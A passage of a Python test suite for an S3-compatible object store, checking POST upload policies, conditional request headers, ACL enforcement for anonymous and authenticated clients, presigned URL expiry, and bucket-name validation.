expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0, 0],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with invalid content length error')
def test_post_object_missing_content_length_argument():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 0],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with invalid JSON error')
def test_post_object_invalid_content_length_argument():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", -1, 0],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='fails with upload size less than minimum allowable error')
def test_post_object_upload_size_below_minimum():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{"bucket": bucket_name},\
["starts-with", "$key", "foo"],\
{"acl": "private"},\
["starts-with", "$Content-Type", "text/plain"],\
["content-length-range", 512, 1000],\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='post')
@attr(operation='authenticated browser based upload via POST request')
@attr(assertion='empty conditions return appropriate error response')
def test_post_object_empty_conditions():
bucket_name = get_new_bucket()
client = get_client()
url = _get_post_url(bucket_name)
utc = pytz.utc
expires = datetime.datetime.now(utc) + datetime.timedelta(seconds=+6000)
policy_document = {"expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"),\
"conditions": [\
{ }\
]\
}
json_policy_document = json.JSONEncoder().encode(policy_document)
bytes_json_policy_document = bytes(json_policy_document, 'utf-8')
policy = base64.b64encode(bytes_json_policy_document)
aws_secret_access_key = get_main_aws_secret_key()
aws_access_key_id = get_main_aws_access_key()
signature = base64.b64encode(hmac.new(bytes(aws_secret_access_key, 'utf-8'), policy, hashlib.sha1).digest())
payload = OrderedDict([ ("key" , "foo.txt"),("AWSAccessKeyId" , aws_access_key_id),\
("acl" , "private"),("signature" , signature),("policy" , policy),\
("Content-Type" , "text/plain"),('file', ('bar'))])
r = requests.post(url, files=payload, verify=get_config_ssl_verify())
eq(r.status_code, 400)
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Match: the latest ETag')
@attr(assertion='succeeds')
def test_get_object_ifmatch_good():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
etag = response['ETag']
response = client.get_object(Bucket=bucket_name, Key='foo', IfMatch=etag)
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Match: bogus ETag')
@attr(assertion='fails 412')
def test_get_object_ifmatch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo', IfMatch='"ABCORZ"')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-None-Match: the latest ETag')
@attr(assertion='fails 304')
def test_get_object_ifnonematch_good():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
etag = response['ETag']
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo', IfNoneMatch=etag)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 304)
eq(e.response['Error']['Message'], 'Not Modified')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-None-Match: bogus ETag')
@attr(assertion='succeeds')
def test_get_object_ifnonematch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo', IfNoneMatch='ABCORZ')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Modified-Since: before')
@attr(assertion='succeeds')
def test_get_object_ifmodifiedsince_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo', IfModifiedSince='Sat, 29 Oct 1994 19:43:31 GMT')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Modified-Since: after')
@attr(assertion='fails 304')
def test_get_object_ifmodifiedsince_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
last_modified = str(response['LastModified'])
last_modified = last_modified.split('+')[0]
mtime = datetime.datetime.strptime(last_modified, '%Y-%m-%d %H:%M:%S')
after = mtime + datetime.timedelta(seconds=1)
after_str = time.strftime("%a, %d %b %Y %H:%M:%S GMT", after.timetuple())
time.sleep(1)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo', IfModifiedSince=after_str)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 304)
eq(e.response['Error']['Message'], 'Not Modified')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Unmodified-Since: before')
@attr(assertion='fails 412')
def test_get_object_ifunmodifiedsince_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo', IfUnmodifiedSince='Sat, 29 Oct 1994 19:43:31 GMT')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Unmodified-Since: after')
@attr(assertion='succeeds')
def test_get_object_ifunmodifiedsince_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo', IfUnmodifiedSince='Sat, 29 Oct 2100 19:43:31 GMT')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='data re-write w/ If-Match: the latest ETag')
@attr(assertion='replaces previous data and metadata')
@attr('fails_on_aws')
def test_put_object_ifmatch_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
etag = response['ETag'].replace('"', '')
# pass in custom header 'If-Match' before PutObject call
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': etag}))
client.meta.events.register('before-call.s3.PutObject', lf)
response = client.put_object(Bucket=bucket_name,Key='foo', Body='zar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'zar')
@attr(resource='object')
@attr(method='get')
@attr(operation='get w/ If-Match: bogus ETag')
@attr(assertion='fails 412')
def test_put_object_ifmatch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
# pass in custom header 'If-Match' before PutObject call
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': '"ABCORZ"'}))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='zar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite existing object w/ If-Match: *')
@attr(assertion='replaces previous data and metadata')
@attr('fails_on_aws')
def test_put_object_ifmatch_overwrite_existed_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
response = client.put_object(Bucket=bucket_name,Key='foo', Body='zar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'zar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite non-existing object w/ If-Match: *')
@attr(assertion='fails 412')
@attr('fails_on_aws')
def test_put_object_ifmatch_nonexisted_failed():
bucket_name = get_new_bucket()
client = get_client()
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='bar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite existing object w/ If-None-Match: outdated ETag')
@attr(assertion='replaces previous data and metadata')
@attr('fails_on_aws')
def test_put_object_ifnonmatch_good():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-None-Match': 'ABCORZ'}))
client.meta.events.register('before-call.s3.PutObject', lf)
response = client.put_object(Bucket=bucket_name,Key='foo', Body='zar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'zar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite existing object w/ If-None-Match: the latest ETag')
@attr(assertion='fails 412')
@attr('fails_on_aws')
def test_put_object_ifnonmatch_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
etag = response['ETag'].replace('"', '')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-None-Match': etag}))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='zar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite non-existing object w/ If-None-Match: *')
@attr(assertion='succeeds')
@attr('fails_on_aws')
def test_put_object_ifnonmatch_nonexisted_good():
bucket_name = get_new_bucket()
client = get_client()
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-None-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
@attr(resource='object')
@attr(method='put')
@attr(operation='overwrite existing object w/ If-None-Match: *')
@attr(assertion='fails 412')
@attr('fails_on_aws')
def test_put_object_ifnonmatch_overwrite_existed_failed():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
lf = (lambda **kwargs: kwargs['params']['headers'].update({'If-None-Match': '*'}))
client.meta.events.register('before-call.s3.PutObject', lf)
e = assert_raises(ClientError, client.put_object, Bucket=bucket_name, Key='foo', Body='zar')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 412)
eq(error_code, 'PreconditionFailed')
response = client.get_object(Bucket=bucket_name, Key='foo')
body = _get_body(response)
eq(body, 'bar')
def _setup_bucket_object_acl(bucket_acl, object_acl):
"""
add a foo key, and specified key and bucket acls to
a (new or existing) bucket.
"""
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL=bucket_acl, Bucket=bucket_name)
client.put_object(ACL=object_acl, Bucket=bucket_name, Key='foo')
return bucket_name
def _setup_bucket_acl(bucket_acl=None):
"""
set up a new bucket with specified acl
"""
bucket_name = get_new_bucket_name()
client = get_client()
client.create_bucket(ACL=bucket_acl, Bucket=bucket_name)
return bucket_name
@attr(resource='object')
@attr(method='get')
@attr(operation='publically readable bucket')
@attr(assertion='bucket is readable')
def test_object_raw_get():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
unauthenticated_client = get_unauthenticated_client()
response = unauthenticated_client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='get')
@attr(operation='deleted object and bucket')
@attr(assertion='fails 404')
def test_object_raw_get_bucket_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
client.delete_bucket(Bucket=bucket_name)
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='get')
@attr(operation='deleted object and bucket')
@attr(assertion='fails 404')
def test_object_delete_key_bucket_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
client.delete_bucket(Bucket=bucket_name)
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.delete_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='get')
@attr(operation='deleted object')
@attr(assertion='fails 404')
def test_object_raw_get_object_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
@attr(resource='bucket')
@attr(method='head')
@attr(operation='head bucket')
@attr(assertion='succeeds')
def test_bucket_head():
bucket_name = get_new_bucket()
client = get_client()
response = client.head_bucket(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='bucket')
@attr(method='head')
@attr(operation='non-existant bucket')
@attr(assertion='fails 404')
def test_bucket_head_notexist():
bucket_name = get_new_bucket_name()
client = get_client()
e = assert_raises(ClientError, client.head_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
# n.b., RGW does not send a response document for this operation,
# which seems consistent with
# https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
#eq(error_code, 'NoSuchKey')
@attr('fails_on_aws')
@attr(resource='bucket')
@attr(method='head')
@attr(operation='read bucket extended information')
@attr(assertion='extended information is getting updated')
def test_bucket_head_extended():
bucket_name = get_new_bucket()
client = get_client()
response = client.head_bucket(Bucket=bucket_name)
eq(int(response['ResponseMetadata']['HTTPHeaders']['x-rgw-object-count']), 0)
eq(int(response['ResponseMetadata']['HTTPHeaders']['x-rgw-bytes-used']), 0)
_create_objects(bucket_name=bucket_name, keys=['foo','bar','baz'])
response = client.head_bucket(Bucket=bucket_name)
eq(int(response['ResponseMetadata']['HTTPHeaders']['x-rgw-object-count']), 3)
eq(int(response['ResponseMetadata']['HTTPHeaders']['x-rgw-bytes-used']), 9)
@attr(resource='bucket.acl')
@attr(method='get')
@attr(operation='unauthenticated on private bucket')
@attr(assertion='succeeds')
def test_object_raw_get_bucket_acl():
bucket_name = _setup_bucket_object_acl('private', 'public-read')
unauthenticated_client = get_unauthenticated_client()
response = unauthenticated_client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object.acl')
@attr(method='get')
@attr(operation='unauthenticated on private object')
@attr(assertion='fails 403')
def test_object_raw_get_object_acl():
bucket_name = _setup_bucket_object_acl('public-read', 'private')
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='authenticated on public bucket/object')
@attr(assertion='succeeds')
def test_object_raw_authenticated():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
response = client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='get')
@attr(operation='authenticated on private bucket/private object with modified response headers')
@attr(assertion='succeeds')
def test_object_raw_response_headers():
bucket_name = _setup_bucket_object_acl('private', 'private')
client = get_client()
response = client.get_object(Bucket=bucket_name, Key='foo', ResponseCacheControl='no-cache', ResponseContentDisposition='bla', ResponseContentEncoding='aaa', ResponseContentLanguage='esperanto', ResponseContentType='foo/bar', ResponseExpires='123')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
eq(response['ResponseMetadata']['HTTPHeaders']['content-type'], 'foo/bar')
eq(response['ResponseMetadata']['HTTPHeaders']['content-disposition'], 'bla')
eq(response['ResponseMetadata']['HTTPHeaders']['content-language'], 'esperanto')
eq(response['ResponseMetadata']['HTTPHeaders']['content-encoding'], 'aaa')
eq(response['ResponseMetadata']['HTTPHeaders']['cache-control'], 'no-cache')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='authenticated on private bucket/public object')
@attr(assertion='succeeds')
def test_object_raw_authenticated_bucket_acl():
bucket_name = _setup_bucket_object_acl('private', 'public-read')
client = get_client()
response = client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='authenticated on public bucket/private object')
@attr(assertion='succeeds')
def test_object_raw_authenticated_object_acl():
bucket_name = _setup_bucket_object_acl('public-read', 'private')
client = get_client()
response = client.get_object(Bucket=bucket_name, Key='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='get')
@attr(operation='authenticated on deleted object and bucket')
@attr(assertion='fails 404')
def test_object_raw_authenticated_bucket_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
client.delete_bucket(Bucket=bucket_name)
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchBucket')
@attr(resource='object')
@attr(method='get')
@attr(operation='authenticated on deleted object')
@attr(assertion='fails 404')
def test_object_raw_authenticated_object_gone():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
client.delete_object(Bucket=bucket_name, Key='foo')
e = assert_raises(ClientError, client.get_object, Bucket=bucket_name, Key='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 404)
eq(error_code, 'NoSuchKey')
@attr(resource='object')
@attr(method='get')
@attr(operation='x-amz-expires check not expired')
@attr(assertion='succeeds')
def test_object_raw_get_x_amz_expires_not_expired():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
params = {'Bucket': bucket_name, 'Key': 'foo'}
url = client.generate_presigned_url(ClientMethod='get_object', Params=params, ExpiresIn=100000, HttpMethod='GET')
res = requests.get(url, verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 200)
@attr(resource='object')
@attr(method='get')
@attr(operation='check x-amz-expires value out of range zero')
@attr(assertion='fails 403')
def test_object_raw_get_x_amz_expires_out_range_zero():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
params = {'Bucket': bucket_name, 'Key': 'foo'}
url = client.generate_presigned_url(ClientMethod='get_object', Params=params, ExpiresIn=0, HttpMethod='GET')
res = requests.get(url, verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 403)
@attr(resource='object')
@attr(method='get')
@attr(operation='check x-amz-expires value out of max range')
@attr(assertion='fails 403')
def test_object_raw_get_x_amz_expires_out_max_range():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
params = {'Bucket': bucket_name, 'Key': 'foo'}
url = client.generate_presigned_url(ClientMethod='get_object', Params=params, ExpiresIn=609901, HttpMethod='GET')
res = requests.get(url, verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 403)
@attr(resource='object')
@attr(method='get')
@attr(operation='check x-amz-expires value out of positive range')
@attr(assertion='succeeds')
def test_object_raw_get_x_amz_expires_out_positive_range():
bucket_name = _setup_bucket_object_acl('public-read', 'public-read')
client = get_client()
params = {'Bucket': bucket_name, 'Key': 'foo'}
url = client.generate_presigned_url(ClientMethod='get_object', Params=params, ExpiresIn=-7, HttpMethod='GET')
res = requests.get(url, verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 403)
@attr(resource='object')
@attr(method='put')
@attr(operation='unauthenticated, no object acls')
@attr(assertion='fails 403')
def test_object_anon_put():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo')
unauthenticated_client = get_unauthenticated_client()
e = assert_raises(ClientError, unauthenticated_client.put_object, Bucket=bucket_name, Key='foo', Body='foo')
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'AccessDenied')
@attr(resource='object')
@attr(method='put')
@attr(operation='unauthenticated, publically writable object')
@attr(assertion='succeeds')
def test_object_anon_put_write_access():
bucket_name = _setup_bucket_acl('public-read-write')
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo')
unauthenticated_client = get_unauthenticated_client()
response = unauthenticated_client.put_object(Bucket=bucket_name, Key='foo', Body='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='put')
@attr(operation='authenticated, no object acls')
@attr(assertion='succeeds')
def test_object_put_authenticated():
bucket_name = get_new_bucket()
client = get_client()
response = client.put_object(Bucket=bucket_name, Key='foo', Body='foo')
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
@attr(resource='object')
@attr(method='put')
@attr(operation='authenticated, no object acls')
@attr(assertion='succeeds')
def test_object_raw_put_authenticated_expired():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo')
params = {'Bucket': bucket_name, 'Key': 'foo'}
url = client.generate_presigned_url(ClientMethod='put_object', Params=params, ExpiresIn=-1000, HttpMethod='PUT')
# params wouldn't take a 'Body' parameter so we're passing it in here
res = requests.put(url, data="foo", verify=get_config_ssl_verify()).__dict__
eq(res['status_code'], 403)
def check_bad_bucket_name(bucket_name):
"""
Attempt to create a bucket with a specified name, and confirm
that the request fails because of an invalid bucket name.
"""
client = get_client()
e = assert_raises(ClientError, client.create_bucket, Bucket=bucket_name)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidBucketName')
# AWS does not enforce all documented bucket restrictions.
# http://docs.amazonwebservices.com/AmazonS3/2006-03-01/dev/index.html?BucketRestrictions.html
@attr('fails_on_aws')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='name begins with underscore')
@attr(assertion='fails with subdomain: 400')
def test_bucket_create_naming_bad_starts_nonalpha():
bucket_name = get_new_bucket_name()
check_bad_bucket_name('_' + bucket_name)
def check_invalid_bucketname(invalid_name):
"""
Send a create bucket_request with an invalid bucket name
that will bypass the ParamValidationError that would be raised
if the invalid bucket name that was passed in normally.
This function returns the status and error code from the failure
"""
client = get_client()
valid_bucket_name = get_new_bucket_name()
def replace_bucketname_from_url(**kwargs):
url = kwargs['params']['url']
new_url = url.replace(valid_bucket_name, invalid_name)
kwargs['params']['url'] = new_url
client.meta.events.register('before-call.s3.CreateBucket', replace_bucketname_from_url)
e = assert_raises(ClientError, client.create_bucket, Bucket=invalid_name)
status, error_code = _get_status_and_error_code(e.response)
return (status, error_code)
@attr(resource='bucket')
@attr(method='put')
@attr(operation='empty name')
@attr(assertion='fails 405')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_create_naming_bad_short_empty():
invalid_bucketname = ''
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 405)
eq(error_code, 'MethodNotAllowed')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='short (one character) name')
@attr(assertion='fails 400')
def test_bucket_create_naming_bad_short_one():
check_bad_bucket_name('a')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='short (two character) name')
@attr(assertion='fails 400')
def test_bucket_create_naming_bad_short_two():
check_bad_bucket_name('aa')
# Breaks DNS with SubdomainCallingFormat
@attr('fails_with_subdomain')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='excessively long names')
@attr(assertion='fails with subdomain: 400')
# TODO: remove this fails_on_rgw when I fix it
@attr('fails_on_rgw')
def test_bucket_create_naming_bad_long():
invalid_bucketname = 256*'a'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
invalid_bucketname = 280*'a'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
invalid_bucketname = 3000*'a'
status, error_code = check_invalid_bucketname(invalid_bucketname)
eq(status, 400)
def check_good_bucket_name(name, _prefix=None):
"""
Attempt to create a bucket with a specified name
and (specified or default) prefix, returning the
results of that effort.
"""
# tests using this with the default prefix must *not* rely on
# being able to set the initial character, or exceed the max len
# tests using this with a custom prefix are responsible for doing
# their own setup/teardown nukes, with their custom prefix; this
# should be very rare
if _prefix is None:
_prefix = get_prefix()
bucket_name = '{prefix}{name}'.format(
prefix=_prefix,
name=name,
)
client = get_client()
response = client.create_bucket(Bucket=bucket_name)
eq(response['ResponseMetadata']['HTTPStatusCode'], 200)
def _test_bucket_create_naming_good_long(length):
"""
Attempt to create a bucket whose name (including the
prefix) is of a specified length.
"""
# tests using this with the default prefix must *not* rely on
# being able to set the initial character, or exceed the max len
